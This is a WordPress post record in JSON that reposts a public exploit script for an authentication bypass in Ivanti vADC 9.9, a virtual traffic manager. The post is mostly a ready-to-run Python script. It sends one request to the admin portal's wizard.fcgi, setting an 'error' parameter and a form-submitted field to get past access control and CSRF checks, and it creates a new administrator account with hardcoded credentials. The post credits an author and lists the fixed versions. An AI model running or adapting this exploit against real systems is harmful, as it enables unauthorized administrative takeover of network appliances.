{"id":58641,"date":"2024-08-05T20:39:48","date_gmt":"2024-08-05T17:39:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179906\/ivantiadc99-bypass.txt"},"modified":"2024-08-05T20:39:48","modified_gmt":"2024-08-05T17:39:48","slug":"ivanti-adc-9-9-authentication-bypass","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ivanti-adc-9-9-authentication-bypass\/","title":{"rendered":"Ivanti ADC 9.9 Authentication Bypass"},"content":{"rendered":"

# Exploit Title: Ivanti vADC 9.9 – Authentication Bypass
# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https:\/\/www.ivanti.com\/en-gb\/products\/virtual-application-delivery-controller
# Software Link: https:\/\/hubgw.docker.com\/r\/pulsesecure\/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC
# Fixed versions: 22.7R2+<\/p>\n

import requests<\/p>\n

# Set to target address
admin_portal = ‘https:\/\/192.168.88.130:9090’<\/p>\n

# User to create
new_admin_name = ‘newadmin’
new_admin_password = ‘newadmin1234’<\/p>\n

requests.packages.urllib3.disable_warnings()
session = requests.Session()<\/p>\n

# Setting ‘error’ bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { ‘error’: 1,
‘section’: ‘Access Management:LocalUsers’ }<\/p>\n

# Create new user request
# _form_submitted to bypass CSRF
data = { ‘_form_submitted’: ‘form’,
‘create_user’: ‘Create’,
‘group’: ‘admin’,
‘newusername’: new_admin_name,
‘password1’: new_admin_password,
‘password2’: new_admin_password }<\/p>\n

# Post request
r = session.post(admin_portal + “\/apps\/zxtm\/wizard.fcgi”, params=params, data=data, verify=False, allow_redirects=False)<\/p>\n

# View response
content = r.content.decode(‘utf-8’)
print(content)<\/p>\n

if r.status_code == 200 and ‘<title>2<‘ in content:
print(“New user request sent”)
print(“Login with username ‘” + new_admin_name + “‘ and password ‘” + new_admin_password + “‘”)
else:
print(“Unable to create new user”)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Ivanti vADC 9.9 – Authentication Bypass# Date: 2024-08-03# Exploit Author: ohnoisploited# Vendor Homepage: https:\/\/www.ivanti.com\/en-gb\/products\/virtual-application-delivery-controller# Software Link: https:\/\/hubgw.docker.com\/r\/pulsesecure\/vtm# Version: 9.9# Tested on: Linux# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC # Fixed versions: 22.7R2+ import requests # Set to target addressadmin_portal = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58641","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58641"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58641\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}